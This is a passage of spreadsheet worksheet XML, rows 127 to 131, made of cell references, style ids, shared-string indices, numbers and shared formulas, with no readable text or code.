      <c r="C127" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D127" s="72" t="s">
        <v>1246</v>
      </c>
      <c r="E127" s="72" t="s">
        <v>1318</v>
      </c>
      <c r="F127" s="72" t="s">
        <v>1319</v>
      </c>
      <c r="G127" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H127" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I127" s="73" t="s">
        <v>1320</v>
      </c>
      <c r="J127" s="73" t="s">
        <v>1321</v>
      </c>
      <c r="K127" s="73" t="s">
        <v>1322</v>
      </c>
      <c r="L127" s="74">
        <v>76.0</v>
      </c>
      <c r="M127" s="74">
        <v>1.0</v>
      </c>
      <c r="N127" s="74">
        <v>1.0</v>
      </c>
      <c r="O127" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P127" s="74">
        <v>1.0</v>
      </c>
      <c r="Q127" s="74">
        <v>0.0</v>
      </c>
      <c r="R127" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S127" s="76" t="s">
        <v>1323</v>
      </c>
      <c r="T127" s="76" t="s">
        <v>1324</v>
      </c>
      <c r="U127" s="77" t="s">
        <v>1325</v>
      </c>
      <c r="V127" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W127" s="109"/>
      <c r="X127" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y127" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z127" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA127" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB127" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC127" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD127" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE127" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF127" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG127" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH127" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI127" s="78"/>
      <c r="AJ127" s="78"/>
      <c r="AK127" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL127" s="78"/>
      <c r="AM127" s="78"/>
      <c r="AN127" s="78"/>
      <c r="AO127" s="78"/>
      <c r="AP127" s="80"/>
      <c r="AQ127" s="80"/>
      <c r="AR127" s="80"/>
      <c r="AS127" s="80">
        <v>0.0</v>
      </c>
      <c r="AT127" s="80"/>
      <c r="AU127" s="80"/>
      <c r="AV127" s="80"/>
      <c r="AW127" s="80"/>
      <c r="AX127" s="80"/>
      <c r="AY127" s="80"/>
      <c r="AZ127" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA127" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB127" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC127" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD127" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE127" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF127" s="82"/>
      <c r="BG127" s="82"/>
      <c r="BH127" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI127" s="82"/>
      <c r="BJ127" s="82"/>
      <c r="BK127" s="82"/>
      <c r="BL127" s="82"/>
      <c r="BM127" s="83"/>
      <c r="BN127" s="83"/>
      <c r="BO127" s="83"/>
      <c r="BP127" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ127" s="83"/>
      <c r="BR127" s="83"/>
      <c r="BS127" s="83"/>
      <c r="BT127" s="83"/>
      <c r="BU127" s="83"/>
      <c r="BV127" s="83"/>
      <c r="BW127" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX127" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY127" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ127" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA127" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB127" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC127" s="85"/>
      <c r="CD127" s="85"/>
      <c r="CE127" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF127" s="85"/>
      <c r="CG127" s="85"/>
      <c r="CH127" s="85"/>
      <c r="CI127" s="85"/>
      <c r="CJ127" s="86"/>
      <c r="CK127" s="86"/>
      <c r="CL127" s="86"/>
      <c r="CM127" s="86">
        <v>0.0</v>
      </c>
      <c r="CN127" s="86"/>
      <c r="CO127" s="86"/>
      <c r="CP127" s="86"/>
      <c r="CQ127" s="86"/>
      <c r="CR127" s="86"/>
      <c r="CS127" s="86"/>
      <c r="CT127" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU127" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CV127" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CW127" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX127" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY127" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ127" s="88"/>
      <c r="DA127" s="88"/>
      <c r="DB127" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC127" s="88"/>
      <c r="DD127" s="88"/>
      <c r="DE127" s="88"/>
      <c r="DF127" s="88"/>
      <c r="DG127" s="89"/>
      <c r="DH127" s="89"/>
      <c r="DI127" s="89"/>
      <c r="DJ127" s="89">
        <v>0.0</v>
      </c>
      <c r="DK127" s="89"/>
      <c r="DL127" s="89"/>
      <c r="DM127" s="89"/>
      <c r="DN127" s="89"/>
      <c r="DO127" s="89"/>
      <c r="DP127" s="89"/>
      <c r="DQ127" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR127" s="91"/>
      <c r="DS127" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT127" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU127" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV127" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW127" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX127" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY127" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ127" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA127" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB127" s="74"/>
      <c r="EC127" s="74">
        <v>0.0</v>
      </c>
      <c r="ED127" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE127" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="128" ht="153.75" customHeight="1">
      <c r="B128" s="71" t="s">
        <v>1245</v>
      </c>
      <c r="C128" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D128" s="72" t="s">
        <v>1246</v>
      </c>
      <c r="E128" s="72" t="s">
        <v>1326</v>
      </c>
      <c r="F128" s="72" t="s">
        <v>1327</v>
      </c>
      <c r="G128" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H128" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I128" s="73" t="s">
        <v>1328</v>
      </c>
      <c r="J128" s="73" t="s">
        <v>1269</v>
      </c>
      <c r="K128" s="73" t="s">
        <v>1329</v>
      </c>
      <c r="L128" s="74">
        <v>3.0</v>
      </c>
      <c r="M128" s="74">
        <v>1.0</v>
      </c>
      <c r="N128" s="74">
        <v>1.0</v>
      </c>
      <c r="O128" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P128" s="74">
        <v>1.0</v>
      </c>
      <c r="Q128" s="74">
        <v>0.0</v>
      </c>
      <c r="R128" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S128" s="76" t="s">
        <v>1330</v>
      </c>
      <c r="T128" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U128" s="77" t="s">
        <v>1331</v>
      </c>
      <c r="V128" s="76" t="s">
        <v>1332</v>
      </c>
      <c r="W128" s="76" t="s">
        <v>1333</v>
      </c>
      <c r="X128" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y128" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z128" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA128" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB128" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC128" s="113" t="s">
        <v>112</v>
      </c>
      <c r="AD128" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE128" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF128" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG128" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH128" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI128" s="78"/>
      <c r="AJ128" s="78"/>
      <c r="AK128" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL128" s="78"/>
      <c r="AM128" s="78"/>
      <c r="AN128" s="78"/>
      <c r="AO128" s="78"/>
      <c r="AP128" s="80"/>
      <c r="AQ128" s="80"/>
      <c r="AR128" s="80"/>
      <c r="AS128" s="80">
        <v>0.0</v>
      </c>
      <c r="AT128" s="80"/>
      <c r="AU128" s="80"/>
      <c r="AV128" s="80"/>
      <c r="AW128" s="80"/>
      <c r="AX128" s="80"/>
      <c r="AY128" s="80"/>
      <c r="AZ128" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA128" s="82" t="s">
        <v>1334</v>
      </c>
      <c r="BB128" s="82">
        <v>4.0</v>
      </c>
      <c r="BC128" s="82">
        <v>8.0</v>
      </c>
      <c r="BD128" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE128" s="82" t="s">
        <v>1334</v>
      </c>
      <c r="BF128" s="82"/>
      <c r="BG128" s="82"/>
      <c r="BH128" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI128" s="82"/>
      <c r="BJ128" s="82"/>
      <c r="BK128" s="82"/>
      <c r="BL128" s="82"/>
      <c r="BM128" s="83"/>
      <c r="BN128" s="83"/>
      <c r="BO128" s="83"/>
      <c r="BP128" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ128" s="83"/>
      <c r="BR128" s="83"/>
      <c r="BS128" s="83"/>
      <c r="BT128" s="83"/>
      <c r="BU128" s="83"/>
      <c r="BV128" s="83"/>
      <c r="BW128" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX128" s="85" t="s">
        <v>1335</v>
      </c>
      <c r="BY128" s="85">
        <v>5.0</v>
      </c>
      <c r="BZ128" s="85">
        <v>10.0</v>
      </c>
      <c r="CA128" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB128" s="85" t="s">
        <v>1335</v>
      </c>
      <c r="CC128" s="85"/>
      <c r="CD128" s="85"/>
      <c r="CE128" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF128" s="85"/>
      <c r="CG128" s="85"/>
      <c r="CH128" s="85"/>
      <c r="CI128" s="85"/>
      <c r="CJ128" s="86"/>
      <c r="CK128" s="86"/>
      <c r="CL128" s="86"/>
      <c r="CM128" s="86">
        <v>0.0</v>
      </c>
      <c r="CN128" s="86"/>
      <c r="CO128" s="86"/>
      <c r="CP128" s="86"/>
      <c r="CQ128" s="86"/>
      <c r="CR128" s="86"/>
      <c r="CS128" s="86"/>
      <c r="CT128" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU128" s="88" t="s">
        <v>1336</v>
      </c>
      <c r="CV128" s="88">
        <v>9.0</v>
      </c>
      <c r="CW128" s="88">
        <v>21.0</v>
      </c>
      <c r="CX128" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY128" s="88" t="s">
        <v>1337</v>
      </c>
      <c r="CZ128" s="88"/>
      <c r="DA128" s="88"/>
      <c r="DB128" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC128" s="88"/>
      <c r="DD128" s="88"/>
      <c r="DE128" s="88"/>
      <c r="DF128" s="88"/>
      <c r="DG128" s="89"/>
      <c r="DH128" s="89"/>
      <c r="DI128" s="89"/>
      <c r="DJ128" s="89">
        <v>0.0</v>
      </c>
      <c r="DK128" s="89"/>
      <c r="DL128" s="89"/>
      <c r="DM128" s="89"/>
      <c r="DN128" s="89"/>
      <c r="DO128" s="89"/>
      <c r="DP128" s="89"/>
      <c r="DQ128" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR128" s="91"/>
      <c r="DS128" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT128" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU128" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV128" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW128" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX128" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY128" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ128" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA128" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB128" s="74"/>
      <c r="EC128" s="74">
        <v>0.0</v>
      </c>
      <c r="ED128" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE128" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="129" ht="153.75" customHeight="1">
      <c r="A129" s="176"/>
      <c r="B129" s="71" t="s">
        <v>1245</v>
      </c>
      <c r="C129" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D129" s="72" t="s">
        <v>1246</v>
      </c>
      <c r="E129" s="72" t="s">
        <v>1338</v>
      </c>
      <c r="F129" s="72" t="s">
        <v>1339</v>
      </c>
      <c r="G129" s="72" t="s">
        <v>1340</v>
      </c>
      <c r="H129" s="72" t="s">
        <v>1341</v>
      </c>
      <c r="I129" s="73" t="s">
        <v>1342</v>
      </c>
      <c r="J129" s="73" t="s">
        <v>1343</v>
      </c>
      <c r="K129" s="73" t="s">
        <v>1344</v>
      </c>
      <c r="L129" s="74">
        <v>26.0</v>
      </c>
      <c r="M129" s="74">
        <v>1.0</v>
      </c>
      <c r="N129" s="74">
        <v>1.0</v>
      </c>
      <c r="O129" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P129" s="74">
        <v>1.0</v>
      </c>
      <c r="Q129" s="74">
        <v>0.0</v>
      </c>
      <c r="R129" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S129" s="76" t="s">
        <v>1323</v>
      </c>
      <c r="T129" s="76" t="s">
        <v>1345</v>
      </c>
      <c r="U129" s="77" t="s">
        <v>1346</v>
      </c>
      <c r="V129" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W129" s="109"/>
      <c r="X129" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y129" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z129" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA129" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB129" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC129" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD129" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE129" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF129" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG129" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH129" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI129" s="78"/>
      <c r="AJ129" s="78"/>
      <c r="AK129" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL129" s="78"/>
      <c r="AM129" s="78"/>
      <c r="AN129" s="78"/>
      <c r="AO129" s="78"/>
      <c r="AP129" s="80"/>
      <c r="AQ129" s="80"/>
      <c r="AR129" s="80"/>
      <c r="AS129" s="80">
        <v>0.0</v>
      </c>
      <c r="AT129" s="80"/>
      <c r="AU129" s="80"/>
      <c r="AV129" s="80"/>
      <c r="AW129" s="80"/>
      <c r="AX129" s="80"/>
      <c r="AY129" s="80"/>
      <c r="AZ129" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA129" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB129" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC129" s="82"/>
      <c r="BD129" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE129" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF129" s="82"/>
      <c r="BG129" s="82"/>
      <c r="BH129" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI129" s="82"/>
      <c r="BJ129" s="82"/>
      <c r="BK129" s="82"/>
      <c r="BL129" s="82"/>
      <c r="BM129" s="83"/>
      <c r="BN129" s="83"/>
      <c r="BO129" s="83"/>
      <c r="BP129" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ129" s="83"/>
      <c r="BR129" s="83"/>
      <c r="BS129" s="83"/>
      <c r="BT129" s="83"/>
      <c r="BU129" s="83"/>
      <c r="BV129" s="83"/>
      <c r="BW129" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX129" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY129" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ129" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA129" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB129" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC129" s="85"/>
      <c r="CD129" s="85"/>
      <c r="CE129" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF129" s="85"/>
      <c r="CG129" s="85"/>
      <c r="CH129" s="85"/>
      <c r="CI129" s="85"/>
      <c r="CJ129" s="86"/>
      <c r="CK129" s="86"/>
      <c r="CL129" s="86"/>
      <c r="CM129" s="86">
        <v>0.0</v>
      </c>
      <c r="CN129" s="86"/>
      <c r="CO129" s="86"/>
      <c r="CP129" s="86"/>
      <c r="CQ129" s="86"/>
      <c r="CR129" s="86"/>
      <c r="CS129" s="86"/>
      <c r="CT129" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU129" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CV129" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CW129" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX129" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY129" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ129" s="88"/>
      <c r="DA129" s="88"/>
      <c r="DB129" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC129" s="88"/>
      <c r="DD129" s="88"/>
      <c r="DE129" s="88"/>
      <c r="DF129" s="88"/>
      <c r="DG129" s="89"/>
      <c r="DH129" s="89"/>
      <c r="DI129" s="89"/>
      <c r="DJ129" s="89">
        <v>0.0</v>
      </c>
      <c r="DK129" s="89"/>
      <c r="DL129" s="89"/>
      <c r="DM129" s="89"/>
      <c r="DN129" s="89"/>
      <c r="DO129" s="89"/>
      <c r="DP129" s="89"/>
      <c r="DQ129" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR129" s="91"/>
      <c r="DS129" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT129" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU129" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV129" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW129" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX129" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY129" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ129" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA129" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB129" s="74"/>
      <c r="EC129" s="74">
        <v>0.0</v>
      </c>
      <c r="ED129" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE129" s="96" t="s">
        <v>112</v>
      </c>
      <c r="EN129" s="176"/>
    </row>
    <row r="130" ht="153.75" customHeight="1">
      <c r="A130" s="176"/>
      <c r="B130" s="71" t="s">
        <v>1347</v>
      </c>
      <c r="C130" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D130" s="72" t="s">
        <v>1348</v>
      </c>
      <c r="E130" s="72" t="s">
        <v>1349</v>
      </c>
      <c r="F130" s="72" t="s">
        <v>1350</v>
      </c>
      <c r="G130" s="72" t="s">
        <v>1351</v>
      </c>
      <c r="H130" s="72" t="s">
        <v>1352</v>
      </c>
      <c r="I130" s="73" t="s">
        <v>1353</v>
      </c>
      <c r="J130" s="73" t="s">
        <v>1354</v>
      </c>
      <c r="K130" s="73" t="s">
        <v>1355</v>
      </c>
      <c r="L130" s="74">
        <v>1.0</v>
      </c>
      <c r="M130" s="74">
        <v>1.0</v>
      </c>
      <c r="N130" s="74">
        <v>1.0</v>
      </c>
      <c r="O130" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P130" s="74">
        <v>1.0</v>
      </c>
      <c r="Q130" s="74">
        <v>0.0</v>
      </c>
      <c r="R130" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S130" s="76" t="s">
        <v>1323</v>
      </c>
      <c r="T130" s="76" t="s">
        <v>1356</v>
      </c>
      <c r="U130" s="77" t="s">
        <v>1357</v>
      </c>
      <c r="V130" s="76" t="s">
        <v>1358</v>
      </c>
      <c r="W130" s="76" t="s">
        <v>1359</v>
      </c>
      <c r="X130" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y130" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z130" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA130" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB130" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC130" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD130" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE130" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF130" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG130" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH130" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI130" s="78"/>
      <c r="AJ130" s="78"/>
      <c r="AK130" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL130" s="78"/>
      <c r="AM130" s="78"/>
      <c r="AN130" s="78"/>
      <c r="AO130" s="78"/>
      <c r="AP130" s="80"/>
      <c r="AQ130" s="80"/>
      <c r="AR130" s="80"/>
      <c r="AS130" s="80">
        <v>0.0</v>
      </c>
      <c r="AT130" s="80"/>
      <c r="AU130" s="80"/>
      <c r="AV130" s="80"/>
      <c r="AW130" s="80"/>
      <c r="AX130" s="80"/>
      <c r="AY130" s="80"/>
      <c r="AZ130" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA130" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB130" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC130" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD130" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE130" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF130" s="82"/>
      <c r="BG130" s="82"/>
      <c r="BH130" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI130" s="82"/>
      <c r="BJ130" s="82"/>
      <c r="BK130" s="82"/>
      <c r="BL130" s="82"/>
      <c r="BM130" s="83"/>
      <c r="BN130" s="83"/>
      <c r="BO130" s="83"/>
      <c r="BP130" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ130" s="83"/>
      <c r="BR130" s="83"/>
      <c r="BS130" s="83"/>
      <c r="BT130" s="83"/>
      <c r="BU130" s="83"/>
      <c r="BV130" s="83"/>
      <c r="BW130" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX130" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY130" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ130" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA130" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB130" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC130" s="85"/>
      <c r="CD130" s="85"/>
      <c r="CE130" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF130" s="85"/>
      <c r="CG130" s="85"/>
      <c r="CH130" s="85"/>
      <c r="CI130" s="85"/>
      <c r="CJ130" s="86"/>
      <c r="CK130" s="86"/>
      <c r="CL130" s="86"/>
      <c r="CM130" s="86">
        <v>0.0</v>
      </c>
      <c r="CN130" s="86"/>
      <c r="CO130" s="86"/>
      <c r="CP130" s="86"/>
      <c r="CQ130" s="86"/>
      <c r="CR130" s="86"/>
      <c r="CS130" s="86"/>
      <c r="CT130" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU130" s="88" t="s">
        <v>149</v>
      </c>
      <c r="CV130" s="88">
        <v>2.0</v>
      </c>
      <c r="CW130" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX130" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY130" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ130" s="88"/>
      <c r="DA130" s="88"/>
      <c r="DB130" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC130" s="88"/>
      <c r="DD130" s="88"/>
      <c r="DE130" s="88"/>
      <c r="DF130" s="88"/>
      <c r="DG130" s="89"/>
      <c r="DH130" s="89"/>
      <c r="DI130" s="89"/>
      <c r="DJ130" s="89">
        <v>0.0</v>
      </c>
      <c r="DK130" s="89"/>
      <c r="DL130" s="89"/>
      <c r="DM130" s="89"/>
      <c r="DN130" s="89"/>
      <c r="DO130" s="89"/>
      <c r="DP130" s="89"/>
      <c r="DQ130" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR130" s="91"/>
      <c r="DS130" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT130" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU130" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV130" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW130" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX130" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY130" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ130" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA130" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB130" s="74"/>
      <c r="EC130" s="74">
        <v>0.0</v>
      </c>
      <c r="ED130" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE130" s="96" t="s">
        <v>112</v>
      </c>
      <c r="EN130" s="176"/>
    </row>
    <row r="131" ht="153.75" customHeight="1">
      <c r="A131" s="176"/>
      <c r="B131" s="71" t="s">
        <v>1347</v>
      </c>
      <c r="C131" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D131" s="72" t="s">
        <v>1348</v>
      </c>
      <c r="E131" s="72" t="s">
        <v>1360</v>
      </c>
      <c r="F131" s="72" t="s">
        <v>1361</v>
      </c>
      <c r="G131" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H131" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I131" s="73" t="s">
        <v>1362</v>
      </c>
      <c r="J131" s="73" t="s">
        <v>441</v>
      </c>
      <c r="K131" s="73" t="s">
        <v>1363</v>
      </c>
      <c r="L131" s="74">
        <v>911.0</v>
      </c>
      <c r="M131" s="74">
        <v>1.0</v>
      </c>
      <c r="N131" s="74">
        <v>1.0</v>
      </c>
      <c r="O131" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P131" s="74">
        <v>1.0</v>
      </c>
      <c r="Q131" s="74">
        <v>0.0</v>
      </c>
      <c r="R131" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S131" s="76" t="s">
        <v>1364</v>
      </c>
      <c r="T131" s="76" t="s">
        <v>1365</v>
      </c>
      <c r="U131" s="77" t="s">
        <v>1366</v>
      </c>
      <c r="V131" s="76" t="s">
        <v>1367</v>
      </c>
      <c r="W131" s="123" t="s">
        <v>1368</v>
      </c>
      <c r="X131" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y131" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z131" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA131" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB131" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC131" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD131" s="101">
        <v>1394.0</v>
      </c>
      <c r="AE131" s="78">
        <v>1.0</v>
      </c>
      <c r="AF131" s="78">
        <v>18.0</v>
      </c>
      <c r="AG131" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH131" s="101">
        <v>1394.0</v>
      </c>
      <c r="AI131" s="101"/>
      <c r="AJ131" s="101"/>
      <c r="AK131" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL131" s="101"/>
      <c r="AM131" s="101"/>
      <c r="AN131" s="101"/>
      <c r="AO131" s="101"/>
      <c r="AP131" s="80"/>
      <c r="AQ131" s="80"/>
      <c r="AR131" s="80"/>
      <c r="AS131" s="80">
        <v>1.0</v>
      </c>
      <c r="AT131" s="80"/>
      <c r="AU131" s="80"/>
      <c r="AV131" s="80"/>
      <c r="AW131" s="80"/>
